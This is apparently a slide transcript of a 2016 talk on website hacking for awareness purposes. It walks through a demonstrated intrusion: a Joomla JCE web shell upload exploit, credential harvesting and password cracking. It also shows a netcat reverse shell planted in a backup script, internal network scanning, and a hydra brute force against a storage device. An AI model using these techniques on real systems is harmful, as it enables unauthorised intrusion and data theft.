securious talk at the swcsc event on 24th feb 2016
TRANSCRIPT
www.securious.co.uk
Pete WoodwardPCI QSA|CISSP|MBCS|CEH
A look into Hacking Websites
www.securious.co.uk
• What is a Hacker?
• Who Hacks?
• Why should we care?
• An Ethical Hack
Agenda
www.securious.co.uk
What is a Hacker?
In the computer security context, a hacker is
someone who seeks and exploits weaknesses
in a computer system or computer network.
www.securious.co.uk
www.securious.co.uk
White Hat
Black Hat
Grey Hat
Fall into 3 categories
Breaks security for non-malicious reasons.
‘Ethical Hacker’
Violates computer security for little reason beyond
maliciousness or personal gain.
‘Criminal’
Lies between a black hat and a white hat, may hack systems
for the sole purpose of notifying the Administrator that their
system has a security defect.
www.securious.co.uk
Why should we care?
www.securious.co.uk
Why should we care?
www.securious.co.uk
Why should we care?
• Name
• Address
• Date of Birth
• Email Address
• Telephone number
• TalkTalk account information
• Credit Card details and/or bank
account details
www.securious.co.uk
Why should we care?
www.securious.co.uk
Why should we care?
www.securious.co.uk
An Ethical Hack
www.securious.co.uk
An Ethical Hack
Generally, the method behind most data breaches isn’t
glamorous, and most involves basic stuff, like bad
passwords, insecure remote access, un-patched systems,
default credentials, or a simple breakdown in the human
data control chain.
www.securious.co.uk
Starts with Footprinting and Reconnaissance
• Finding Company’s Public and Restricted Websites
• Determining the Operating System
• Collect Location Information
• People Search: Social Networking Services
www.securious.co.uk
We then conduct Scanning
• Check for LIVE systems (ICMP Scanning)
• Ping Sweeping on a range of IP addresses
• Attempt to obtain a response (ICMP Echo-Reply) that
will indicate if a system is LIVE
• Fping is a useful automated tool and helps speeds up
the scanning process
www.securious.co.uk
Next is Enumeration
• First REAL attack on target network
• Involves active connections to a system and directed
queries
• Attempt to identify network resources and shares
• Find Users, Groups, applications and passwords in
use
www.securious.co.uk
The Hack
Identified a target Website – happens to be running Joomla!
Copyright Dr Paul Dowland,
Secure South West 6
Generated using https://www.shodan.io/
www.securious.co.uk
The Hack
Target specific vulnerability within Joomla! …and deploy a
simple script…
Copyright Dr Paul Dowland,
Secure South West 6
root@kali:~# perl jce.pl target.domain.org
.::. Exploit for JCE Joomla Extension (Auto Shell
Uploader) V0.1 .::.
|||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net)
||||
[*] Checking Exploitability ...
[*] Trying to upload 0day.gif ...
[*] Trying to change extension from .gif to .php ...
[+] 0day.php was successfully uploaded
[+] Path:
target.domain.org/images/stories/0day.php?cmd=id
www.securious.co.uk
The Hack
We can examine the file system…find blog config and get
MySQL credentials…
Copyright Dr Paul Dowland,
Secure South West 6
/* Database Settings */
var $host = 'localhost';
var $user = 'root';
var $password = 'root';
var $db = 'blog';
var $dbprefix = 'jos _';
www.securious.co.uk
The Hack
Get the blog admin password…Joomla! Uses a simple
hashing mechanism…
md5(Password+salt)
stored as hash:salt
Copyright Dr Paul Dowland,
Secure South West 6
fdb3d81d39d925c1332559d2ea53823e:
Ckbco8niuZ6ZR9lSnB80I8NtJki325j2
Write a simple script with a password list to
crack the hash….
www.securious.co.uk
The Hack
Launch a Remote Shell…’netcat’ for example
Copyright Dr Paul Dowland,
Secure South West 6
www.securious.co.uk
The Hack
Escalate privileges…
Copyright Dr Paul Dowland,
Secure South West 6
@echo Dumping blog
@"C:\Program Files (x86)\MySQL\MySQL Server
5.5\bin\mysqldump.exe" --user=%dbuser% --
password=%dbpass% --databases blog --log-
error="C:\Backup\dumperrors.txt" >
"C:\Backup\blog.%backupdate%.sql"
START c:\inetpub\wwwroot\images\stories\nc
x.x.x.y 80 -e cmd.exe
www.securious.co.uk
The Hack
Get Windows Passwords…
Copyright Dr Paul Dowland,
Secure South West 6
>pwdump7
Administrator:500:NO
PASSWORD*********************:47443E24FE435EB5210D91EF28
38659D:::
Guest:501:NO PASSWORD*********************:NO
PASSWORD*********************:::
hackme:1004:NO
PASSWORD*********************:F1B94635FACC09D9FCC637A113
DC10B1:::
hackme2:1005:NO
PASSWORD*********************:079F890A968B7F710A373ABB79
EB11EB:::
Pwdump v7.1 - raw password extractor
Author: Andres Tarasco Acuna
www.securious.co.uk
The Hack
Crack the Password… (ophcrack)
Copyright Dr Paul Dowland,
Secure South West 6
www.securious.co.uk
The Hack
Cracked…in around 15 minutes, using FREE tool..!
Copyright Dr Paul Dowland,
Secure South West 6
Via: http://ophcrack.sourceforge.net/
079F890A968B7F710A373ABB79EB11EB
Wizard1!
www.securious.co.uk
The Hack
Scan INTERNAL network…
Copyright Dr Paul Dowland,
Secure South West 6
>nmap -sn 192.168.1.0/24
Starting Nmap 7.01 ( https://nmap.org )
MAC Address: 00:1E:67:9A:7E:23 (Intel Corporate)
Nmap scan report for 192.168.1.50
Host is up (0.00s latency).
MAC Address: 00:1D:73:FA:11:D2 (Buffalo.inc)
Nmap scan report for 192.168.1.200
Host is up (0.00s latency).
MAC Address: 00:24:B2:BA:6C:90 (Netgear)
Nmap scan report for 192.168.1.100
Host is up (0.00s latency).
MAC Address: 00:24:B2:BA:66:B4 (Netgear)
Nmap scan report for 192.168.1.101
Host is up (0.00s latency).
www.securious.co.uk
The Hack
Scan INTERESTING host…
Copyright Dr Paul Dowland,
Secure South West 6
>nmap 192.168.1.200
Starting Nmap 7.01 ( https://nmap.org )
Nmap scan report for 192.168.1.200
Host is up (0.00s latency).
Not shown: 1084 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open sunrpc
139/tcp open netbios-ssn
199/tcp open unknown
443/tcp open https
445/tcp open microsoft-ds
548/tcp open afpovertcp
www.securious.co.uk
The Hack
Enumerate the shares…
Copyright Dr Paul Dowland,
Secure South West 6
>net view \\192.168.1.200
Shared resources at \\192.168.1.200
TEST-NAS_SECRET_Storage_01
Share name Type Used as Comment
----------------------------------------
Applications Disk Applications share
DiskImages Disk Imaging Share
Media Disk Media Share
Projects Disk Projects share
Scratch Disk Scratch space
The command completed successfully.
www.securious.co.uk
The Hack
Access the Network Storage Device…(Password cracking tool)
Copyright Dr Paul Dowland,
Secure South West 6
>hydra -l hackme -P top500.txt -s 443 192.168.1.200
https-get /shares/
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not
use in military or secret service organizations, or
for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-
02-07 23:16:06
[DATA] max 16 tasks per 1 server, overall 64 tasks,
500 login tries (l:1/p:500),
~0 tries per task
[DATA] attacking service http-get on port 443 with SSL
[443][http-get] host: 192.168.1.200 login: Admin
password: letmeIN
www.securious.co.uk
The Hack
Enjoy….
Copyright Dr Paul Dowland,
Secure South West 6
>net use z: \\192.168.1.200\diskimages
letmeIN /USER:Admin
The command completed successfully.
>dir z:
Volume in drive Z is DiskImages
Volume Serial Number is 3A5C-C2B8
Directory of Z:\
10/01/2016 15:00 <DIR> .
11/05/2015 22:01 <DIR> ..
04/11/2014 15:48 <DIR> Test Stuff
22/07/2015 22:02 <DIR> SECRET STUFF
17/10/2014 15:48 <DIR> Old Stuff
...
www.securious.co.uk
Any Questions?